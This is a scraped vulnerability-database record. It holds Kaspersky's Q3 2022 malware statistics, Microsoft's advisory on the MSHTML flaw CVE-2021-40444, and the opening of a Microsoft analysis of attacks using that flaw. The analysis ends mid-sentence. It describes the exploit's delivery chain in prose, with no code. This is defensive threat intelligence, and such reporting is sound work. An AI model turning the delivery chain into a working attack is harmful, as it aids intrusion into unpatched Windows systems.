FBI to seize about $500,000 paid as ransom after a Maui ransomware attack. The Trojan was likely [used](<https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/>) by the North Korean operators Andariel. The DOJ said victims had started getting their money back.\n\nThe creators of the little-known AstraLocker and Yashma ransomware [published](<https://www.bleepingcomputer.com/news/security/astralocker-ransomware-shuts-down-and-releases-decryptors/>) decryptors and stopped spreading both of them. The hackers provided no explanation for the move, but it appeared to be related to an increase in media coverage.\n\n### Number of new modifications\n\nIn Q3 2022, we detected 17 new ransomware families and 14,626 new modifications of this malware type. More than 11,000 of those were assigned the verdict of Trojan-Ransom.Win32.Crypmod, which hit the sixth place in our rankings of the most widespread ransomware Trojans.\n\n_Number of new ransomware modifications, Q3 2021 \u2014 Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154421/03-en-ru-es-malware-report-q3-2022-pc-stat.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q3 2022, Kaspersky products and technologies protected 72,941 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154500/04-en-malware-report-q3-2022-pc-stat.png>))_\n\n**TOP 10 most common families of ransomware Trojans**\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 14.76 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.12 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 11.68 \n4 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 6.59 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.53 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypmod \n7 | Magniber | Trojan-Ransom.Win64.Magni | 4.93 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 4.84 \n9 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 4.35 \n10 | Hive | Trojan-Ransom.Win32.Hive | 3.87 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n### Geography of attacked users\n\n**TOP 10 countries and territories attacked by ransomware Trojans**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.66 \n2 | Yemen | 1.30 \n3 | South Korea | 0.98 \n4 | Taiwan | 0.77 \n5 | Mozambique | 0.64 \n6 | China | 0.52 \n7 | Colombia | 0.43 \n8 | Nigeria | 0.40 \n9 | Pakistan | 0.39 \n10 | Venezuela | 0.32 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 14.76 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.12 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 11.68 \n4 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 6.59 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.53 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.46 \n7 | Magniber | Trojan-Ransom.Win64.Magni | 4.93 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 4.84 \n9 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 4.35 \n10 | Hive | Trojan-Ransom.Win32.Hive | 3.87 \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to providing statistical data. \n** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q3 2022, Kaspersky systems detected 153,773 new miner mods. More than 140,000 of these were found in July and August; combined with June's figure of more than 35,000, this suggests that miner creators kept themselves abnormally busy this past summer.\n\n_Number of new miner modifications, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154533/06-en-malware-report-q3-2022-pc-stat.png>))_\n\n### Number of users attacked by miners\n\nIn Q3, we detected attacks that used miners on the computers of 432,363 unique users of Kaspersky products worldwide. A quieter period from late spring through the early fall was followed by another increase in activity.\n\n_Number of unique users attacked by miners, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154601/07-en-malware-report-q3-2022-pc-stat.png>))_\n\n### Geography of miner attacks\n\n**TOP 10 countries and territories attacked by miners**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Ethiopia | 2.38 \n2 | Kazakhstan | 2.13 \n3 | Uzbekistan | 2.01 \n4 | Rwanda | 1.93 \n5 | Tajikistan | 1.83 \n6 | Venezuela | 1.78 \n7 | Kyrgyzstan | 1.73 \n8 | Mozambique | 1.57 \n9 | Tanzania | 1.56 \n10 | Ukraine | 1.54 \n \n_* Excluded are countries and territories with relatively few users of Kaspersky products (under 50,000). \n** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by criminals during cyberattacks\n\n### Quarterly highlights\n\nQ3 2022 was remembered for a series of vulnerabilities discovered in various software products. Let's begin with Microsoft Windows and some of its components. Researchers found new vulnerabilities that affected the CLFS driver: [CVE-2022-30220](<https://nvd.nist.gov/vuln/detail/CVE-2022-30220>), along with [CVE-2022-35803](<https://nvd.nist.gov/vuln/detail/CVE-2022-35803>) and [CVE-2022-37969](<https://nvd.nist.gov/vuln/detail/CVE-2022-37969>), both encountered in the wild. By manipulating Common Log File System data in a specific way, an attacker can make the kernel write their own data to arbitrary memory addresses, allowing cybercriminals to hijack kernel control and elevate their privileges in the system. Several vulnerabilities were discovered in the Print Spooler service: [CVE-2022-22022](<https://nvd.nist.gov/vuln/detail/CVE-2022-22022>), [CVE-2022-30206](<https://nvd.nist.gov/vuln/detail/CVE-2022-30206>), and [CVE-2022-30226](<https://nvd.nist.gov/vuln/detail/CVE-2022-30226>). These allow elevating the system privileges through a series of manipulations while installing a printer. Serious vulnerabilities were also discovered in the Client/Server Runtime Subsystem (CSRSS), an essential Windows component. Some of these can be exploited for privilege escalation ([CVE-2022-22047](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047>), [CVE-2022-22049](<https://nvd.nist.gov/vuln/detail/CVE-2022-22049>), and [CVE-2022-22026](<https://nvd.nist.gov/vuln/detail/CVE-2022-22026>)), while [CVE-2022-22038](<https://nvd.nist.gov/vuln/detail/CVE-2022-22038>) affects remote procedure call (RPC) protocol, allowing an attacker to execute arbitrary code remotely. A series of critical vulnerabilities were discovered in the graphics subsystem, including [CVE-2022-22034](<https://nvd.nist.gov/vuln/detail/CVE-2022-22034>) and [CVE-2022-35750](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35750>), which can also be exploited for privilege escalation. Note that most of the above vulnerabilities require that exploits entrench in the system before an attacker can run their malware. The Microsoft Support Diagnostic Tool (MSDT) was found to contain a further two vulnerabilities, [CVE-2022-34713](<https://nvd.nist.gov/vuln/detail/CVE-2022-34713>) and [CVE-2022-35743](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35743>), which can be exploited to take advantage of security flaws in the link handler to remotely run commands in the system.\n\nMost of the network threats detected in Q3 2022 were again attacks associated with [brute-forcing](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) passwords for Microsoft SQL Server, RDP, and other services. Network attacks on vulnerable versions of Windows via EternalBlue, EternalRomance, and other exploits were still common. The attempts at exploiting network services and other software via vulnerabilities in the Log4j library ([CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), [CVE-2021-44832](<https://nvd.nist.gov/vuln/detail/CVE-2021-44832>), [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>), and [CVE-2021-45105](<https://nvd.nist.gov/vuln/detail/cve-2021-45105>)) also continued. Several vulnerabilities were found in the Microsoft Windows Network File System (NFS) driver. These are [CVE-2022-22028](<https://nvd.nist.gov/vuln/detail/CVE-2022-22028>), which can lead to leakage of confidential information, as well as [CVE-2022-22029](<https://nvd.nist.gov/vuln/detail/CVE-2022-22029>), [CVE-2022-22039](<https://nvd.nist.gov/vuln/detail/CVE-2022-22039>) and [CVE-2022-34715](<https://nvd.nist.gov/vuln/detail/CVE-2022-34715>), which a cybercriminal can use to remotely execute arbitrary code in the system \u2014 in kernel context \u2014 by using a specially crafted network packet. The TCP/IP stack was found to contain the critical vulnerability [CVE-2022-34718](<https://nvd.nist.gov/vuln/detail/CVE-2022-34718>), which allows in theory to remotely exploit a target system by taking advantage of errors in the IPv6 protocol handler. Finally, it is worth mentioning the [CVE-2022-34724](<https://nvd.nist.gov/vuln/detail/CVE-2022-34724>) vulnerability, which affects Windows DNS Server and can lead to denial of service if exploited.\n\nTwo vulnerabilities in Microsoft Exchange Server, [CVE-2022-41040](<https://nvd.nist.gov/vuln/detail/CVE-2022-41040>) and [CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/CVE-2022-41082>), received considerable media coverage. They were collectively dubbed "ProxyNotShell" in reference to the ProxyShell vulnerabilities with similar exploitation technique (they were closed earlier). Researchers discovered the ProxyNotShell exploits while investigating an APT attack: an authenticated user can use the loopholes to elevate their privileges and run arbitrary code on an MS Exchange server. As a result, the attacker can steal confidential data, encrypt critical files on the server to to extort money from the victim, etc.\n\n### Vulnerability statistics\n\nIn Q3 2022, malicious Microsoft Office documents again accounted for the greatest number of detections \u2014 80% of the exploits we discovered, although the number decreased slightly compared to Q2. Most of these detections were triggered by exploits that targeted the following vulnerabilities:\n\n * [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), in the Equation Editor component, which allow corrupting the application memory when processing formulas, and subsequently running arbitrary code in the system;\n * [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>), which allows downloading and running malicious script files;\n * [CVE-2022-30190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30190>), also known as "Follina", which exploits a flaw in the Microsoft Windows Support Diagnostic Tool (MSDT) for running arbitrary programs in a vulnerable system even in Protected Mode or when macros are disabled;\n * [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>), which allows an attacker to deploy malicious code using a special ActiveX template due to inadequate input validation.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154631/09-en-malware-report-q3-2022-pc-stat.png>))_\n\nThese were followed by exploits that target browsers. Their share amounted to 6%, or 1% higher than in Q2. We will list the most serious vulnerabilities, all of them targeting Google Chrome:\n\n * [CVE-2022-2294](<https://nvd.nist.gov/vuln/detail/CVE-2022-2294>), in the WebRTC component, which leads to buffer overflow;\n * [CVE-2022-2624](<https://nvd.nist.gov/vuln/detail/CVE-2022-2624>), which exploits a memory overflow error in the PDF viewing component;\n * [CVE-2022-2295](<https://nvd.nist.gov/vuln/detail/CVE-2022-2295>), a Type Confusion error that allows an attacker to corrupt the browser process memory remotely and run arbitrary code in a sandbox;\n * [CVE-2022-3075](<https://nvd.nist.gov/vuln/detail/CVE-2022-3075>), an error linked to inadequate input validation in the Mojo interprocess communication component in Google Chromium-based browsers that allows escaping the sandbox and running arbitrary commands in the system.\n\nSince many modern browsers are based on Google Chromium, attackers can often take advantage of the shared vulnerabilities to attack the other browsers as long as they run on one engine.\n\nA series of vulnerabilities were identified in Microsoft Edge. Worth noting is [CVE-2022-33649](<https://nvd.nist.gov/vuln/detail/CVE-2022-33649>), which allows running an application in the system by circumventing the browser protections; [CVE-2022-33636](<https://nvd.nist.gov/vuln/detail/CVE-2022-33636>) and [CVE-2022-35796](<https://nvd.nist.gov/vuln/detail/CVE-2022-35796>), Race Condition vulnerabilities that ultimately allow a sandbox escape; and [CVE-2022-38012](<https://nvd.nist.gov/vuln/detail/CVE-2022-38012>), which exploits an application memory corruption error, with similar results.\n\nThe Mozilla Firefox browser was found to contain vulnerabilities associated with memory corruption, which allow running arbitrary code in the system: [CVE-2022-38476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38476>), a Race Condition vulnerability that leads to a subsequent Use-After-Free scenario, and the similar vulnerabilities [CVE-2022-38477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38477>) and [CVE-2022-38478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38478>), which exploit memory corruption. As you can see from our reports, browsers are an attractive target for cybercriminals, as these are widely used and allow attackers to infiltrate the system remotely and virtually unbeknownst to the user. That said, browser vulnerabilities are not simple to exploit, as attackers often have to use a chain of vulnerabilities to work around the protections of modern browsers.\n\nThe remaining positions in our rankings were distributed among Android (5%) and Java (4%) exploits. The fifth-highest number of exploits (3%) targeted Adobe Flash, a technology that is obsolete but remains in use. Rounding out the rankings with 2% were exploits spread through PDF documents.\n\n## Attacks on macOS\n\nThe third quarter of 2022 brought with it a significant number of interesting macOS malware discoveries. In particular, researchers found [Operation In(ter)ception](<https://www.sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto/>), a campaign operated by North Korean Lazarus group, which targets macOS users looking for cryptocurrency jobs. The malware was disguised as documents containing summaries of positions at Coinbase and Crypto.com.\n\n[CloudMensis](<https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/>), a spy program written in Objective-C, used cloud storage services as C&C servers and [shared several characteristics](<https://twitter.com/ESETresearch/status/1575103839115804672>) with the RokRAT Windows malware operated by ScarCruft.\n\nThe creators of XCSSET [adapted](<https://www.sentinelone.com/blog/xcsset-malware-update-macos-threat-actors-prepare-for-life-without-python/>) their toolset to macOS Monterey and migrated from Python 2 to Python 3.\n\nIn Q3, cybercrooks also began to make use of open-source tools in their attacks. July saw the discovery of two campaigns that used a fake [VPN application](<https://www.sentinelone.com/blog/from-the-front-lines-new-macos-covid-malware-masquerades-as-apple-wears-face-of-apt/>) and fake [Salesforce updates](<https://twitter.com/ESETresearch/status/1547943014860894210>), both built on the Sliver framework.\n\nIn addition to this, researchers announced a new multi-platform [find](<https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/>): the LuckyMouse group (APT27 / Iron Tiger / Emissary Panda) attacked Windows, Linux, and macOS users with a malicious mod of the Chinese MiMi instant messaging application.\n\n### TOP 20 threats for macOS\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Amc.e | 14.77 \n2 | AdWare.OSX.Pirrit.ac | 10.45 \n3 | AdWare.OSX.Agent.ai | 9.40 \n4 | Monitor.OSX.HistGrabber.b | 7.15 \n5 | AdWare.OSX.Pirrit.j | 7.10 \n6 | AdWare.OSX.Bnodlero.at | 6.09 \n7 | AdWare.OSX.Bnodlero.ax | 5.95 \n8 | Trojan-Downloader.OSX.Shlayer.a | 5.71 \n9 | AdWare.OSX.Pirrit.ae | 5.27 \n10 | Trojan-Downloader.OSX.Agent.h | 3.87 \n11 | AdWare.OSX.Bnodlero.bg | 3.46 \n12 | AdWare.OSX.Pirrit.o | 3.32 \n13 | AdWare.OSX.Agent.u | 3.13 \n14 | AdWare.OSX.Agent.gen | 2.90 \n15 | AdWare.OSX.Pirrit.aa | 2.85 \n16 | Backdoor.OSX.Twenbc.e | 2.85 \n17 | AdWare.OSX.Ketin.h | 2.82 \n18 | AdWare.OSX.Pirrit.gen | 2.69 \n19 | Trojan-Downloader.OSX.Lador.a | 2.52 \n20 | Downloader.OSX.InstallCore.ak | 2.28 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nAs usual, our TOP 20 ranking for biggest threats encountered by users of Kaspersky security solutions for macOS were dominated by adware. AdWare.OSX.Amc.e, touted as "Advanced Mac Cleaner," had taken the top place for a second quarter in a row. This application displays fake system issue messages, offering to buy the full version to fix those. Second and third places went to members of the AdWare.OSX.Pirrit and AdWare.OSX.Agent families.\n\n### Geography of threats for macOS\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | France | 1.71 \n2 | Canada | 1.70 \n3 | Russia | 1.57 \n4 | India | 1.53 \n5 | United States | 1.52 \n6 | Spain | 1.48 \n7 | Australia | 1.36 \n8 | Italy | 1.35 \n9 | Mexico | 1.27 \n10 | United Kingdom | 1.24 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000). \n** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nFrance, with 1.71%, was again the most attacked country by number of users. Canada, with 1.70%, and Russia, with 1.57%, followed close behind. The most frequently encountered family in France and Canada was AdWare.OSX.Amc.e, and in Russia, it was AdWare.OSX.Pirrit.ac.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q3 2022, three-fourths of the devices that attacked Kaspersky honeypots used the Telnet protocol.\n\nTelnet | 75.92% \n---|--- \nSSH | 24.08% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q3 2022_\n\nA majority of the attacks on Kaspersky honeypots in terms of sessions were controlled via Telnet as well.\n\nTelnet | 97.53% \n---|--- \nSSH | 2.47% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2022_\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 28.67 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 18.63 \n3 | Backdoor.Linux.Mirai.ba | 11.63 \n4 | Backdoor.Linux.Mirai.cw | 10.94 \n5 | Backdoor.Linux.Gafgyt.a | 3.69 \n6 | Backdoor.Linux.Mirai.ew | 3.49 \n7 | Trojan-Downloader.Shell.Agent.p | 2.56 \n8 | Backdoor.Linux.Gafgyt.bj | 1.63 \n9 | Backdoor.Linux.Mirai.et | 1.17 \n10 | Backdoor.Linux.Mirai.ek | 1.08 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT-threat statistics are published in the DDoS report for Q3 2022.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create these sites on purpose; they can infect hacked legitimate resources as well as web resources with user-created content, such as forums._\n\n### Countries and territories that serve as sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country or territory of the sources of internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q3 2022, Kaspersky solutions blocked 956,074,958 attacks launched from online resources across the globe. A total of 251,288,987 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources country and territory, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154703/11-en-malware-report-q3-2022-pc-stat.png>))_\n\n### Countries and territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.\n\nNote that these rankings only include attacks by malicious objects that fall under the **_Malware_**_ class_; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Taiwan | 19.65 \n2 | Belarus | 17.01 \n3 | Serbia | 15.05 \n4 | Russia | 14.12 \n5 | Algeria | 14.01 \n6 | Turkey | 13.82 \n7 | Tunisia | 13.31 \n8 | Bangladesh | 13.30 \n9 | Moldova | 13.22 \n10 | Palestine | 12.61 \n11 | Yemen | 12.58 \n12 | Ukraine | 12.25 \n13 | Libya | 12.23 \n14 | Sri Lanka | 11.97 \n15 | Kyrgyzstan | 11.69 \n16 | Estonia | 11.65 \n17 | Hong Kong | 11.52 \n18 | Nepal | 11.52 \n19 | Syria | 11.39 \n20 | Lithuania | 11.33 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware**-class attacks as a percentage of all unique users of Kaspersky products in the country._\n\nOn average during the quarter, 9.08% of internet users' computers worldwide were subjected to at least one **Malware**-class web attack.\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q3 2022, our File Anti-Virus detected **49,275,253** malicious and potentially unwanted objects.\n\n### Countries and territories where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThese rankings only include attacks by malicious programs that fall under the **Malware** class; they do not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 46.48 \n2 | Yemen | 45.12 \n3 | Afghanistan | 44.18 \n4 | Cuba | 40.48 \n5 | Tajikistan | 39.17 \n6 | Bangladesh | 37.06 \n7 | Uzbekistan | 37.00 \n8 | Ethiopia | 36.96 \n9 | South Sudan | 36.89 \n10 | Myanmar | 36.64 \n11 | Syria | 34.82 \n12 | Benin | 34.56 \n13 | Burundi | 33.91 \n14 | Tanzania | 33.05 \n15 | Rwanda | 33.03 \n16 | Chad | 33.01 \n17 | Venezuela | 32.79 \n18 | Cameroon | 32.30 \n19 | Sudan | 31.93 \n20 | Malawi | 31.88 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware**-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\nOn average worldwide, Malware-class local threats were registered on 14.74% of users' computers at least once during Q3. Russia scored 16.60% in this ranking.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-18T08:10:34", "type": "securelist", "title": "IT threat evolution in Q3 2022. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2018-0802", "CVE-2021-40444", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105", "CVE-2022-22022", "CVE-2022-22026", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22034", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22047", "CVE-2022-22049", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2624", "CVE-2022-30190", "CVE-2022-30206", "CVE-2022-30220", "CVE-2022-30226", "CVE-2022-3075", "CVE-2022-33636", "CVE-2022-33649", "CVE-2022-34713", "CVE-2022-34715", "CVE-2022-34718", "CVE-2022-34724", "CVE-2022-35743", "CVE-2022-35750", "CVE-2022-35796", "CVE-2022-35803", "CVE-2022-37969", "CVE-2022-38012", "CVE-2022-38476", "CVE-2022-38477", "CVE-2022-38478", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-18T08:10:34", "id": "SECURELIST:C1F2E1B6711C8D84F3E78D203B3CE837", "href": "https://securelist.com/it-threat-evolution-in-q3-2022-non-mobile-statistics/107963/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2022-08-18T15:51:52", "description": "Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.\n\nAn attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nMicrosoft Defender Antivirus and Microsoft Defender for Endpoint both provide detection and protections for the known vulnerability. Customers should keep antimalware products up to date. Customers who utilize automatic updates do not need to take additional action. Enterprise customers who manage updates should select the detection build 1.349.22.0 or newer and deploy it across their environments. Microsoft Defender for Endpoint alerts will be displayed as: \u201cSuspicious Cpl File Execution\u201d.\n\nUpon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.\n\nPlease see the **Mitigations** and **Workaround** sections for important information about steps you can take to protect your system from this vulnerability.\n\n**UPDATE** September 14, 2021: Microsoft has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. Please see the FAQ for important information about which updates are applicable to your system.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-07T07:00:00", "type": "mscve", "title": "Microsoft MSHTML Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-08-16T07:00:00", "id": "MS:CVE-2021-40444", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mmpc": [{"lastseen": "2021-09-30T19:14:09", "description": "In August, Microsoft Threat Intelligence Center (MSTIC) identified a small number of attacks (less than 10) that attempted to exploit a remote code execution vulnerability in MSHTML using specially crafted Microsoft Office documents. These attacks used the vulnerability, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>), as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders. These loaders communicated with an infrastructure that Microsoft associates with multiple cybercriminal campaigns, including human-operated ransomware.\n\nThe observed attack vector relies on a malicious ActiveX control that could be loaded by the browser rendering engine using a malicious Office document. Customers who enabled [attack surface reduction rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules?view=o365-worldwide>) to block Office from creating child processes are not impacted by the exploitation technique used in these attacks. While these attacks used a vulnerability to access entry point devices and run highly-privileged code, the secondary actions taken by the attackers still rely on stealing credentials and moving laterally to cause organization-wide impact. This illustrates the importance of investing in attack surface reduction, credential hygiene, and lateral movement mitigations. Customers are advised to apply the [security patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for CVE-2021-40444 to fully mitigate this vulnerability.\n\nThis blog details our in-depth analysis of the attacks that used the CVE-2021-40444, provides detection details and investigation guidance for [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) customers, and lists mitigation steps for hardening networks against this and similar attacks. Our colleagues at [RiskIQ conducted their own analysis](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>) and coordinated with Microsoft in publishing this research.\n\n## Exploit delivery mechanism\n\nThe initial campaigns in August 2021 likely originated from emails impersonating contracts and legal agreements, where the documents themselves were hosted on file-sharing sites. The exploit document used an external oleObject relationship to embed exploitative JavaScript within MIME HTML remotely hosted content that results in (1) the download of a CAB file containing a DLL bearing an INF file extension, (2) decompression of that CAB file, and (3) execution of a function within that DLL. The DLL retrieves remotely hosted shellcode (in this instance, a custom Cobalt Strike Beacon loader) and loads it into _wabmig.exe_ (Microsoft address import tool.)\n\n\n\n_Figure 1. The original exploit vector: an externally targeted oleObject relationship definition bearing an MHTML handler prefix pointed at an HTML file hosted on infrastructure that has similar qualities to the Cobalt Strike Beacon infrastructure that the loader\u2019s 